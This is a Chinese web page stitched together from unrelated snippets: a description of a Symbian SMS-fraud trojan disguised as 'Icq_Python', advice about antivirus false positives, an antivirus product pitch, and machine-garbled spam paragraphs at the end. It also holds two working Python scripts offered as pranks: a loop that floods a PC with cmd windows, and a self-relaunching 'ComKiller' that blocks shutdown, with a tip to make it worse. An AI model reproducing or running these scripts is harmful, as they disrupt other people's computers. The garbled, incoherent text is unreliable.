木马病毒,
作用与短消息SMS的用Python编写的木马程序!
这个病毒主体文件是个 Python 脚本,只能在支持 Python 的手机平台上运行。
这个脚本文件是嵌在一个 SIS 安装包中的。SIS 安装程序伪装成 “Icq_Python” 诱骗用户安装,并和正常程序一样,安装后程序图标会出现在菜单栏中,并生成如下文件:
!:\system\apps\Icq_reggerNEW\Icq_reggerNEW.app
!:\system\apps\Icq_reggerNEW\default.py
!:\system\apps\Icq_reggerNEW\Icq_reggerNEW.rsc
!:\system\libs\keypress.pyd
!:\system\libs\inbox.pyd
!:\system\libs\appswitch.pyd
其中三个 pyd 文件是病毒脚本用到的导入模块。
当用户点击程序图标运行时,病毒脚本文件 default.py 就会被执行,其行为如下:
a)持续向一个指定号码发送短信;
b)删除收件箱中来自此指定号码的回复短信;
这样用户的手机费就在毫无察觉的情况下被骗取,号码对应的服务商就可以从中牟取暴利。马上查了下话费,没事!
1.你要确保你没有木马。如果真有木马,360提示也是对的。如果你机器上中了木马,360在特定情况下没有检测到。或者是顽固型木马。360杀不掉。这时你下载一个文件,它就感染一个文件。
2.别理360,忽略后,继续安装。如果真有木马。360会帮你杀掉的。
4.360提示错了。不是木马。只是安装程序需要修改注册表,访问其它程序的的目录。仅此而亦。python的程序很容易被误判成木马。 这个很有些冤枉。
很简单,就三行
import os
while True:
os.system('start cmd')
运行的几秒钟后,你电脑满是cmd!
您好:
Python Plgin应该是一个伪装成系统文件的木马病毒,直接删除是删除不掉的,建议您使用腾讯电脑管家对您的电脑进行一下全面的杀毒吧,打开腾讯电脑管家中的杀毒功能选择闪电查杀或者全盘查杀就可以的哦,杀完毒以后重启电脑后那个病毒就消失了,您可以点击这里下载最新版的腾讯电脑管家:最新版腾讯电脑管家下载
如果有其他问题,欢迎继续到电脑管家企业平台提问
# 这是一个小病毒,名叫ComKiller(计算机杀手)
# 效果:运行约10秒后无法正常关机
# 注:把那两行 time.sleep(0.1) 去掉效果更好哦:)
import os
import signal
import ctypes
import time
import threading
from pathlib import Path
def help_sos():
cmdr = os.system("start python %s" % FileName)
def Error():
while True:
try:
help_sos()
except BaseException:
help_sos()
time.sleep(0.1)
signal.signal(signal.SIGTERM, help_sos)
FileName = Path(__file__).name
while True:
time.sleep(1)
T = threading.Thread(target = Error, args = ())
T.start()
#仅用于娱乐,干什么非法的事情和我无关!
汽车的出现 不仅方便 人们的无尽战争连接,而且成为一种社会结构 外弗成 或缺乏丰富多彩的身份。昨天,弗成 否认...
物流 是为各单位 本能功能 运动 一般运行要求的 型物流 。作为物流和医院 物流,我们怎么能不,我们怎么能不总...
许多 病人在治疗后住院 ,他们会读写一个感激 怀疑我们,那些医生 ,它真的写感激 怀疑 ,我们可以 知道 人,...
事情 的时刻 ,每个人都必须 写自己 的事情 总结,所以对于 新员工,如何写自己 的事情 总结?昨天给除夕带来...
与 野庭相比, 如何申请教学贷款?在申请教学贷款时, 需要准备 什么信息 ?现在 给除夕带来的是除夕 教学如何...
对付 保险营业 员去说,他们的事情 才能 战相通技能 长短 常主要 的,常常 撰写事情 总结,无利于他们可以或...